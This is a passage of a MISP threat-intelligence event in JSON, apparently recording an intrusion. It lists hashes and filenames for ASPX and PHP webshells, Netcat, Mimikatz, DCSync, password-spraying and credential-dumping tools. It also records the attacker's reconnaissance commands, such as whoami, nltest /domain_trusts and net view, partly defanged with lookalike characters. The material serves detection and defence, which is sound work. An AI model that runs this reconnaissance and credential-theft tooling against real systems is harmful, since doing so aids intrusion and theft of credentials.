"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664962532",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "5bd20e73-ae9a-41a8-b978-cf12639a317c",
|
|
"value": "sec4ever.aspx",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "basic ASPX webshell",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664962532",
|
|
"uuid": "c0ec7d82-7d12-42dc-aeca-0a21eabe33c9",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664962532",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "3065a661-1d7d-424d-a649-6f9cd728eb75",
|
|
"value": "0152de452f92423829e041af2d783e3f",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664962532",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "436c69a0-60e9-44fd-ab16-641639b82f0a",
|
|
"value": "editor.aspx",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "devilzshell webshell\r\n",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664962532",
|
|
"uuid": "1045be6d-0c9d-4997-a98d-47f5d32951e0",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664962532",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "7dee830a-3a81-46ba-a447-82149b25bac4",
|
|
"value": "7981f1bf9b8e5f4691e4ac440f1ba251",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664962532",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "091ee23c-31bf-431f-b4f9-ed0f6833d9f3",
|
|
"value": "devilzshell.aspx",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "Nightrunner webshell",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664962532",
|
|
"uuid": "78aeb5df-c2ab-48b7-86f9-9c9c7b19e2eb",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664962532",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "5f7732cf-d5b1-4eab-b95d-9e50486b7eb3",
|
|
"value": "4b646e7958e1bb00924b8e6598fe6670",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664962532",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "826530ff-7843-4e17-9f27-cac575549d97",
|
|
"value": "nightrunner.aspx",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "PHP webshell\r\n",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664962532",
|
|
"uuid": "85e8cf0d-dafa-40cc-a12c-888b92dd5b85",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664962532",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "914eb7d5-336f-432c-9056-08bc943b8968",
|
|
"value": "d608163a972f43cc9f53705ed6d31089",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664962532",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "99051cad-46d0-447b-8c5a-4e491d03c468",
|
|
"value": "mini.php",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "Netcat",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664964197",
|
|
"uuid": "053265c5-7ab7-40e2-a284-9cb688db0db7",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664964197",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "1394e93f-2d1d-4faa-a4c2-d9b3ddbb4824",
|
|
"value": "7567f938ee1074cd3932fdb01088ca35",
|
|
"Tag": [
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:tool=\"Netcat\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664964197",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "7ed4280a-247d-4201-9dc0-4b5bbeb9f78b",
|
|
"value": "50.exe",
|
|
"Tag": [
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:tool=\"Netcat\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664964197",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "07c6b71a-2d8e-495f-8567-811cb87abdec",
|
|
"value": "04.exe",
|
|
"Tag": [
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:tool=\"Netcat\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664964197",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "beaae563-273e-4c4a-b7c3-1beae438ffdc",
|
|
"value": "putty.exe",
|
|
"Tag": [
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:tool=\"Netcat\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "Mimikatz",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664964291",
|
|
"uuid": "b56e1f1f-c63e-44f3-beed-7efc71b29f0a",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664964291",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "9c9351e0-4443-4a61-be2e-9423ef62d0b4",
|
|
"value": "566b4858b29cfa48cd5584bebfc7546b",
|
|
"Tag": [
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:malpedia=\"MimiKatz\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:mitre-tool=\"Mimikatz - S0002\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#064800",
|
|
"local": false,
|
|
"name": "misp-galaxy:tool=\"Mimikatz\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664964291",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "d7726f3c-e32f-462e-b7e0-0d76c25633b4",
|
|
"value": "mim.ps1",
|
|
"Tag": [
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:malpedia=\"MimiKatz\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:mitre-tool=\"Mimikatz - S0002\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#064800",
|
|
"local": false,
|
|
"name": "misp-galaxy:tool=\"Mimikatz\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664965118",
|
|
"uuid": "6e306200-9536-48d8-ba02-fb7bc6210e93",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664965118",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "208897ae-eb47-4f55-ae1f-28c3ef024e89",
|
|
"value": "bd876b57f8be84ff5d95c899de34c0ee"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664965118",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "c0fc37e0-2bcf-42cd-b4b7-3d9743fcbef4",
|
|
"value": "Invoke-DCSync.ps1.txt"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "Mimikatz",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664965260",
|
|
"uuid": "0c4e1b7d-9d9a-4fbd-979b-20b4e2a9656d",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664965260",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "e16a9f57-bccf-4e26-be0e-4dce99ee101e",
|
|
"value": "f575d4bb1f5ff6c54b2de99e9bc40c75",
|
|
"Tag": [
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:malpedia=\"MimiKatz\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:mitre-tool=\"Mimikatz - S0002\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#064800",
|
|
"local": false,
|
|
"name": "misp-galaxy:tool=\"Mimikatz\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664965260",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "995e3944-eb79-4174-8a93-4880f683d259",
|
|
"value": "Aaa.txt",
|
|
"Tag": [
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:malpedia=\"MimiKatz\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:mitre-tool=\"Mimikatz - S0002\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#064800",
|
|
"local": false,
|
|
"name": "misp-galaxy:tool=\"Mimikatz\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664965260",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "9c8337ed-e229-4aa4-a39b-0bdcd5a221e7",
|
|
"value": "Aaa.ps1",
|
|
"Tag": [
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:malpedia=\"MimiKatz\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:mitre-tool=\"Mimikatz - S0002\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#064800",
|
|
"local": false,
|
|
"name": "misp-galaxy:tool=\"Mimikatz\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664965335",
|
|
"uuid": "f3aa997e-9b85-4bea-b0ea-a3c25bfdf334",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664965335",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "29f5d293-f7bc-4523-89f7-8129683c1fd4",
|
|
"value": "238a4efe51a9340511788d2752aca8d6"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664965335",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "ce918ba4-2634-4060-9286-264845e21aeb",
|
|
"value": "DomainPasswordSpray.ps1"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664965359",
|
|
"uuid": "94382d57-bf2b-4230-a0b4-5a4a13d61322",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664965359",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "fc546caa-02ea-446a-af15-ff2e92b553a3",
|
|
"value": "550bd7c330795a766c9dfb1586f3cc53"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664965359",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "1ca63786-8ea4-4978-816e-c783264bcb56",
|
|
"value": "Copy-VSS.ps1"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664965379",
|
|
"uuid": "3290ec45-3315-4cd8-a44a-7b193b3c0e73",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664965379",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "01c7176d-b7c1-4c55-bc2b-04f98f1c9a54",
|
|
"value": "68d3bf2c363144ec6874ab360fdda00a"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664965379",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "8e8b098d-7829-4367-a149-19bbb82a3cdb",
|
|
"value": "lazagne.exe"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664965458",
|
|
"uuid": "e6d4afb9-8f17-4616-bf11-e2811c4027e4",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664965458",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "09d06eae-375a-4e4b-adfd-64dbfd7a1195",
|
|
"value": "3437e3e59fda82cdb09eab711ba7389d"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664965458",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "9eb26e2a-9195-4d9a-a013-62dad6ec8cc0",
|
|
"value": "mimilove.exe"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664971638",
|
|
"uuid": "e77a5eb2-08b5-4318-a5f2-919b36810acf",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664971638",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "277d50cc-e850-4b63-b260-400c9b283b9d",
|
|
"value": "cmd.ex\u0435 /c who\u0430mi"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664971638",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "6dfee739-7b80-4f22-85d3-6de460b81f36",
|
|
"value": "Identify user privileges"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664972734",
|
|
"uuid": "c0f056c7-8f46-459a-be27-b44adc75712f",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664972734",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "07efa145-5d14-40a1-9c0e-29fb14690d39",
|
|
"value": "cmd.ex\u0435 /c \u0430ppcmd list site"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664972734",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "cb6066d2-c039-45b3-b1d2-dbdccfe5bea1",
|
|
"value": "List the hosted websites on the web server"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664972794",
|
|
"uuid": "335630e4-b15a-4580-ba4b-397949f9a27a",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664972794",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "f7f1f08d-1522-4969-bbaa-b7489ee98ee7",
|
|
"value": "cmd.ex\u0435 /c nlt\u0435st /domain_trusts"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664972794",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "57bc304a-ea81-4622-bd5a-86e899e80891",
|
|
"value": "List domain controllers and enumerate domain trusts"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664972875",
|
|
"uuid": "a2155916-623b-49d9-95f3-0efa3b8c30b7",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664972875",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5910a1d8-6777-4fad-9b92-7fddb36eac52",
|
|
"value": "cmd.ex\u0435 /\u0441 dir"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664972875",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "bc3f3f48-f44e-419f-8931-ca483dc52321",
|
|
"value": "List current directories and files"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664972899",
|
|
"uuid": "115e07f7-3a2b-454a-9739-d258ea48c461",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664972899",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "60aeca64-d8c6-495d-a52f-56e59ef9933c",
|
|
"value": "cmd.ex\u0435 /c n\u0435t view"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "description",
|
|
"timestamp": "1664972899",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "462fe85e-02f8-4308-b071-2bf0c4e49a85",
|
|
"value": "Display a list of domains, computers, or resources that are being shared by the specified computer"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Command line and option related to a software malicious or not to execute specific commands.",
|
|
"meta-category": "misc",
|
|
"name": "command-line",
|
|
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
|
|
"template_version": "1",
|
|
"timestamp": "1664972997",
|
|
"uuid": "74aba723-d4a6-4ac1-aeef-1ecc3bce0e59",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "value",
|
|
"timestamp": "1664972997",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "b4ff81a8-6765-441c-af30-204fc717e001",
|
|
"value": "cmd.ex\u0435 /c s\u0435t"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
